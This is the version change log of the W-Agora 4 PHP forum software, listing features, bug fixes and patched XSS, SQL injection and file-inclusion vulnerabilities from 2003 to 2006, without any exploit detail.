$Id: ChangeLog,v 1.58 2006/07/11 23:04:38 mdruilhe Exp $
========================
W-Agora 4 : Change Log
========================
(+ : security fixes)
2006 July - Version 4.2.1
============================
o Enhancements / new features :
-------------------------------
* Localization:
- Hungarian translations (sohagabor)
* multiple wysiwyg editor support (currently htmlarea, tinymce and (almost complete) fckeditor)
* ability to send mails to :
- all moderators (bn_mail=2) ,
- all moderators and administrators ($bn_mail = 3)
- only the main moderator (bn_mail =1)
currently, must be set by hand in forum config
o Fixes, code changes :
-----------------------
+ browse_avatar.php : fix Secunia Advisory SA17201
- force site to be selected in order to set allowed extensions,
- remove file if the uploaded file is not an image.
+ extras/quicklist.php : fix Secunia Advisory SA17201 :sanitize site parameter
+ index.php : fix (minor) security bug whith $site parameter
+ globals.inc : fix secunia advisory SA20779
* mail.php :
- fix bug in redirect (missing php extension)
* include/dbaccess.php :
- bad arguments in _openDB() call
- use new ListRenderer::displayList() parameters
- update user stats when a note / thread is deleted (RUSK)
* include/listrenderer.php :
- added getStartItem(), add parameters start & count in displayList()
- remove site parameter in URLs if not needed
- fix typo in $label_posted_by_on
* include/misc_func.php :
- added "object" in allowed tags
- some enhancements in getNavBar(), getListBox(), getListCheckBox(), minimum_phpversion()
- added "id" attribute in all generated form elements
- remove paragraph substitution in my_br2nl() to avoid annoying extras line feed in preview
and emails
- added load_php_extension()
- change in kill_html() : prevent "raw" (entitized) HTML code to be converted in preview / edit mode
- anchor() : fix javascript error in links with ' in the text add unhtmlentities()
* include/mail.php, include/misc_func.php :
- moved rfcDate() from mail.php to misc_func.php so that it can be used elsewhere
- renamed 'X-Posting-Client' header to more commonly used 'X-Originating-IP'
* RSS: various bug fixes and enhancements in rss.php
+ don't list hidden notes
- add RSS link in HTML header ()
- add $no_cookie option (don't send cookies to browser)
- get db parameters from site configuration file
- use HTTP authentication for private forums
- format RSS using XSL/CSS stylesheets
* various bug fixes in Phorum template
* init.inc, globals.inc :
- Fix "database error" in forums list if site database is different than main agora database
- properly set all variables before checking if user is active
- added new constant auth_required to force authentication in init.inc
- set full URI in HTTP redirections : (header('Location:...)
- move "active user" checking after variables settings
- added $bn_doctype ()
- fix extra trailing slash bug in $bn_base_url
* editconf.php3, include/config.php3, init.inc :
- centralize db parameters in getDbaccess()
- site level configuration variables ($db*, usersource, directories) are now only
defined in site configuration file
* include/viewnote.php :
- add 'att_table' CSS class
* mimetypes handling (include/mimetypes.php3)
- XHTML compliance and use CSS in inline attachments rendering
* create_site.php, create_forum.php :
- some HTML4 cleanup (xhtml compliance)
- better error handling
- strip magic quotes in form fields
* admin_notes.php3 :
- fix bug preventing from copying notes to an empty forum
* editlist.php3 :
- fix magic quote bug
* dbaccess.php, include/oci8.php, include/postgres65.php :
- truncate index name to 30 chars for OCI compatibility (hixcks)
- added alias for unknown "datetime" type
* include/mssql7.php3 :
- use mssql_get_last_message(),
- fix primary key syntax error
* include/adomsaccess.php3:
- fix warning in preg_match() line 55
* changes and Bug fixes in include/auth.php, register.php and profile.php:
- update login infos and increment login count if user start a new browser session
but have a permanent cookie set
- allow specialchars in userid
- don't allow to use username of someone else when changing profile
- Ability to allow HTML in some user fields using $user_html_var[] array
- fix bug in input fields checking.
- fix bug with smileys in signature.
- Now smileys and URLs are expanded in details and signature fields
+ Security fixes:
- sanitize input fields + only defined fields are extracted
- No longer rely on userid variable: Only an authenticated user can change his own profile
- Check for permitted fields to be changed (disallow changing of sensible fields
(userpriv, lastlogin, ...)
- logout was not working if permanent cookie was set
* subscribe.php3
- changes in subscriptions list rendering, use CSS
* subscribe_thread.php3:
- don't allow guest users to subscribe anymore
* Enforce security in directories tools/ user/ conf/ and include/
- updated .htaccess (require valid-user)
- prevent directory listing
* Fixed some incompatibilities with new default settings in PHP5:
- use superglobals => "register_long_arrays = off" compatibility (default in PHP5)
- short_open_tag = off compatibility (default in PHP5)
- don't pass arguments by reference in some functions
* add "in-reply-to" header in emails
* made PHP code highlighting working with PHP versions prior to 4.2
* enhancements + bug fixes in search pattern highlighting
* view.php:
- add pg parameter (page num)
- don't increment hits count if note already seen by the same user
- don't loose "pattern" argument in pagination
- prevent hidden notes from being retreived in next/previous thread
- don't show notes where hidden is <> 0 (values>1 can be used for advanced moderation purpose)
- adjust the page accordingly in the thread list even if $st not set
* include/dbstats.php3 1.3:
- fix database error in computeDailyUserStats() and computeDailyForumStats with mysql
- avoid duplicate entries in log_table_*
* user/http_user.php3 1.7:
- set "mail_ok" and "state" user fields properly
* stats/wa_bar_graph.php3:
- attempt to load gd extension if not already loaded
* locales/*_pl.inc
- polish translation update from Bibok
* locales/*
- localize "download file ..." , added LABEL_DOWNLOAD, LABEL_DOWNLOAD_FILE now takes parameters
* tools/upgrade_42.php3:
- more SQL standard compliant, work with sites using different databases
- made alter table cross databases compatible
* list.php3, view.php3:
- set "view mode" (flat/thread) cookie at site level instead of forum level
2005 April 18 - Version 4.2.0
==============================
o Enhancements / new features :
-------------------------------
* New registration mode :
- ability for users to choose a password at registration time (if enabled in register_form template)
- user validation at site level
* Emails enhancements
- Send emails in HTML + text/plain (Use new HTMLMimeMail class)
- Private emails (reserved to registered users)
- Ability to send attachements with emails (configurable at forum level)
* Subscription (mailing list) enhancements
- Ability for users to subscribe to /unsubscribe from several forums at one time
(use {subscribe_forums_list} in subscribe_form template)
- Ability to unsubscribe from threads (use new variable {subscribe_threads_list} in subscribe_form template)
* Pagination in forums and threads lists
* Avatars (configurable in globals.inc)
- ability to choose/upload an avatar
- ability to link an avatar from another website
- add 4 new variables to use in templates (register_form) :
$label_avatar, $show_picture, $label_change_avatar, $choose_picture_field
* Log / stats management
- For maintenance and performances reason, the main log table can now be splitted into 4 tables
(one table per quarter) before being purged. This process is automatically done when calling
stats/index.php
- Daily and monthy stats are pre-calculated and holded into 2 new tables, thus reducing
statistics computation time
- "register" actions are now logged
- views per forum / per users are now collected in the userforum table
* Database optimization
- debugging/profiling support (count SQL queries and execution time)
- Optimize some queries,
- Removed some unused outer joins
- create indexes where needed
* Admin / configuration
- Ability to execute some PHP instructions (bn_before_mail) before sending emails
- mass edit forums: Possibility to change settings (hide, lock, ...) on all forums at a time
- added ALLOWS_INFOS_URL in globals.inc => whether to allow url "index.php?info"
* RSS support:
- rss.php has been rewritten (2.0 compliance)
- allo RSS feeds at site level or at forum level
- now located in the w-agora top directory
* Localization:
- Handle dir and lang attribute in tag
- Hebrew translations (kobi bohbot )
* Miscellaneous:
- let user choose to email or not updated notes
- do not display e-mail address in templates => use {mail_url}, {mail_text}, {mail_link} in templates
- PHP 4.1 is now required
- Change license to GPL
o Fixes, code changes :
-----------------------
* style.css :
- style.css is now splitted in 2 CSS (style.css + admin_style.css) and included as a default CSS
(in display_header())
- some hardcoded styles have been moved to CSS
- new classes: new, hilite, msgbox ...
* include/config.php: fix bug (4.1.7) with backslashes and quotes if magic_quotes_gpc is On
+ include/misc_func : security fixes:
+ msgForm() (bug 4.1.7) prevent all variables to be passed on the query_string
+ prevent javascript/vbscript injection in posts
* include/misc_func : various bug fixes:
- strip_magic_quotes() now handles arrays
- fix 4.1.7 bug with registered_forums_list in register.php
* admin_subscribed_user.php: fix bug with mail sent confirmation message : use $m_to instead of $addresses
* removed htmlarea module (no longer supported). Will be replaced with a more flexible interface
supporting other wysiwyg editors (eg. FCKEditor, tinymce, ...)
* include/cookies.php : fix bug in cookie setting (form fields)
* include/dbaccess :
- add new functions :
getExecTime(), getSessionStats() : profiling
createIndex(), dropIndex(), addPrimaryKey() : indexes handling
getSite(): get site infos
- new parameter $pk in createTable()
* fileupload.php
- fix bug (make file upload working) with open_basedir restriction
- support PHP 4.2 error management
* New classes:
- ListRenderer (display lists)
- DBStats (logs/statistics functions)
* admin_notes.php:
- add pagination (navigation bar) + some bug fixes in moderation:
- can now unhide a message that contains replies but one can't hide it
- maintain current page while hiding/showing a message
- set properly default options in some listboxes
* admin_site.php:
- fix recursive frameset bug if bn is set on click on "manage forums"
* admin_user.php3 :
- list only forums owned by user, except admin & root
* setup.php3:
- HTML 4.01 compliant
- More controls and error handling
- don't loose parameters while switching between advanced and basic modes
* profile.php, register.php :
- various bug fixes, HTML4/XHTML compliance,
- replaced php shorts tags
- replaced hard-coded messages with localized strings
- use checkbox widget
- add log entry
- fix 4.1.7 bug on {register_forums_list}
2004 October 19 - Version 4.1.7
================================
o Enhancements / new features :
-------------------------------
* auto-login feature (keepalive cookie)
For this to work, just add {keepalive_checkbox} in your login form.
* download_thread : add link to normal view + navigation bar (Laurent A.)
* added _FILEMODE constant in globals.inc (umask used to create files)
* add MAIL_CHECK_DNS constant in globals.inc (check DNS MX record while verifying email)
* add $bn_html_dir variable in globals.inc (html content direction, default left-to-right)
* full spanish translations (user side + admin panel)
* allows multiple values fields (select multiple) in user profile form (Karibou)
o Fixes, code changes :
-----------------------
+ 4.0x upgrade scripts: prevent possible remote file inclusion
(if .htaccess not taken into account)
+ fix possible remote include vulnerability in user/http_user (if .htaccess ignored)
+ fix various XSS vulnerability (include/auth.php, list.php, forgot_password.php, download_thread.php)
+ fix "HTTP Response Splitting" Vulnerability (subscribe_thread.php)
+ fix possible sql injection in quicklist.php
* misc_func::kill_quotes() => fix bug with new lines and
* edit_mail.php: fix wrong displayed label for mail_forgot_password field
* Fix typo (parse error) in affected_rows()" in mssql7.php
* create_site:
- don't loose form data while switching between basic <-> advanced mode
- strip magic quotes according to PHP config (don't strip backslashes)
* Don't strip slashes in config variables causing MSSQL7 server name to be corrupted
* enhanced hits count algorythm (view.php): don't increment hits if post is not older than 5 mns
and is the same IP or if the post has been made by the same userid
* quicklist.php :
- add noprint parameter : if set to 1 or true, then return the list as a string ($list)
instead of printing it out (Karibou)
- return to initial directory at the end of script
* misc_func::getListBox() => allows multiple default selected options (comma separated) (Karibou)
* forums registrations were lost if {register_forums_list} was not set in profile template -> fixed
* Don't display private forums in site statistics (dbaccess::getSiteStats)
* fix wrong PHP upload configuration detection
* fix invalid sql with auto increment in create table (mysql 4)
* username/useraddress was not set if moderator doesn't fill the fields in the form
* fix some url variables settings (viewnote.php)
* don't halt program in case of error updating admin password (change_password.php3)
* Upgrade htmlarea to 3.0-rc1
* Update user statistics when note is published after moderation (admin_notes.php3)
* Added some CSS classes: wa_link, wa_textfield
* users.php: don't list 'guest' user + some cosmetics changes
* mail feature:
- Better return-path handling using -f (David Horwitz)
- allow the expansion of variables in the bn_mail_from variable (David Horwitz)
* message posting, updating :
- fix bug in redirection causing $bn_no_thanks_msg to be ignored
- set full URI in redirect url
* better random password generating (include/auth.php)
* magic quotes handling
* fix bug on site templates editing (editform.php)
* user input were not saved into cookie if user is authenticated -> fixed
* file download : handle POST/GET parameters prior to PATH_INFO
(fix possible wrong PATH_INFO setting in CGI context)
* 4.0x upgrade scripts : fix bug preventing user from login
* Fix some messed up error messages
* Attachments are now sorted by id (creation time) while displayed in the message
* Fix bug in edit field panel : now allow "_" in field names
* download_forum : fix bug preventing threads to be displayed
* create_site : fix a possible table creation problem
(In some environments, PHP seem not to include newly created files properly)
* reorder_forums :
- fix an error with MS-SQL server (cecile*at*sdv.fr)
- correct error message
* fix regexp warning in cookies management
* Fix a warning in site listing if open_basedir restriction is On
* Fix some bugs in msgForm, better HTML entitie support
2004 January 16 - Version 4.1.6a
================================
o Fixes, code changes :
-----------------------
* Numerous fixes in message post and wysiwyg editor handling:
- HTML cleanup (better htmlarea support)
- better browser version checking in htmlarea
- allow_html option was ignored if htmlarea used -> fixed
- Fix some bugs with recursive & - lines breaks and html entities conversion in form handling
- prevent some form fields contents to be lost if JS not enabled and required field is missing
- fix bug causing the textarea contents to be lost while uploading the first file
* Enhancements in categories handling
- show categories in forums list
- Added link to categorie display in forums listing
- admin_categories: show category ids + aability to add a forum to a category
* Keep track of current list parameters while editing a user (admin_user.php)
* Set $is_authenticated and $is_moderator for potential use in templates (init_admin.inc)
* Fix SQL parsing error if optional whereclause is given in notes listing
* Fix parse error in delete.php
* Suppress warning output if ini_set has been disabled in php configuration
* New italian translations + fixes (Emanuele)
* Do not list private forums in forums select box
* Check "file_uploads" PHP option in configuration panel, and displays warning if option disabled
* Prevent $pattern to be lost in viewnote.php
* Fix $forums variable name collision in list.php (already defined in init.inc)
2003 December 10 - Version 4.1.6
================================
o Enhancements / new features :
-------------------------------
* New translations packages
- Czech (user part) (Tomas Kruta )
- Dutch (Joke Bekkering )
- Catalan (mac rac )
- Russian )
* WYSIWYG editor (htmlarea component) integration in post/edit form
* Better attachments handling (see code changes) :
- Handle PHP code highlighting for PHP files.
- Dynamic resizing of embedded images (Emanuele )
- more embedded mime-types (video, sound) support
- Use PATH_INFO in attachments URLs :/getfile.php/myforum/101/image.gif instead
of getfile.php?bn=myforum&att_id=101
* Several enhancements in emails management (see code changes)
* Added HTTP Basic authentication module
* Added "shared authentication" module (in extras/shared_user.php3) :
allow a site to share the same user database than another site. see usage instructions in
extras/shared_user.php3.
* Multi-site handling:
- added $default_site variable in globals.inc :
- Don't display the site list if only one active site is configured
* users ranking
* more options in user admin page :
- ability to subscribe, register and send emails to selected users
- Can change the password while editing user profile
- added missing fields in edit form
* Add threads sorting order feature (currently only mysql and postgres are supported) :
ability to sort threads by creation date | topic starter | subject | last updated date ...
Supported only with mysql & postgres
* tools/load_users.php3: interactive form added, users File can now be uploaded, forums registration
* simplified setup process (with 2 modes : basic / advanced)
* ability to move/copy notes between threads/forums (Emanuele )
* complete rewrite of rss backend (tools/rss.php, contrib. from David Horwitz
o Fixes, code changes :
-----------------------
+ XSS & PHP include security fixes :
- include/auth.php3
- editform.php3
- modules.php3
- index.php3
- insert.php3
- update.php3
- browse.php3
+ Removed tags in .htaccess because they potentially allowed POST or other requests
to activate scripts. Now all requests to this must be authorized (tbannist)
- bug fixes in default 'agorabb' and 'phorum' templates
- set bn_title if no forum selected (init.inc)
- Italian translations updates
- Gianni Pezzarini
- Emanuele
- Several fixes in tools/update_*.php3
- set user profile variables in preview mode (insert.php3, update.php3)
- login.php, logout.php : ability to redirect to an URL after login in/out
- display a message and exit program if cookie cannot be set in authenticate()
- moved wa_info() to wa_info.php (new).
- almost full rewriting of admin_subscribed_user.php3
- allow new TLD domains (eg .info) in email validation
- fix undefined variables in include/register_globals.php3
- create_site.php3: insert the owner (ie: if logged in as sys-admin but not 'admin') in the newly
created site
- attachements:
- determine mimetype from extension (if known) rather than browser setting
- added att_icon_multiple in mimetypes.php
- open default HTML link into a blank window
- message id (key) is no longer needed to access attachment from getfile.php (only att_id is required)
- mail management:
- send an email to the list when note is validated (switch from hidden to visible)
- set the recipient in the 'To:' header (rather than Bcc:) if there's only one user in the list
- set the recipients in the "To:" header (rather than Bcc:) if $bn_mail_to is not set.
- Remove possible extras Line feeds in headers.
- handle error if mail is sent to an empty moderators list
- mail template was not handled properly
- Fix some warnings in statistics pages
- Fix language detection bug (HTTP_ACCEPT_LANGUAGE not used properly)
- Fix language detection bug in setup/admin panel if no locale file exists for the selected language
- Fix before_access inclusion in various scripts
- do not show email in user list & profiles
- include/auth.php3: add last Visit timestamp in current session
- change_password.php3: fix header handling bug
- include/form.php3: don't set $mail_reply_box if replies are not allowed [Laurent A.]
- init.inc:
- added $logout_url, $logout_string, $logout_text in display_header()
- don't set {post_link} & {reply_link} if forum in readonly/inactive state.
- delete.php3: do not allow user to delete a note with replies
- update.php3: better password management in the the post/edit form
- Fix bugs with hidden notes handling from moderation page
- insert.php3: Handle redirection by form if header(Location) doesn't work for some reason.
- globals.inc: adjust some PHP settings, fix problems with some configurations (yahoo hosting)
- browse.php3: Use mime-type icons in directory listings + display directories before files list
- include/viewnote.php3: display GUESTUSER_USERNAME properly
- include/viewnote.php3: set delete_link / edit_link according to user rights on the note
- profile.php3, register.php3:
- show private forums in register_forums_list, thus, allowing users
to register in a private forum. Just edit the variable $show_forums (in register.php3)
in order to restrict registration in private forums
- field $name was overwritten : fixed
- code cleanup
- allow registration even if a private forum is selected
- New/changed functions in misc_func.php
- getDBaccess() pass $site as argument instead of config. filename (RFU)
- beginForm() : add enctype parameter
- getPasswordField()
- getTextArea()
- customMenu(), getCustomMenu()
- getRadioButton(), getCheckBox() : add id +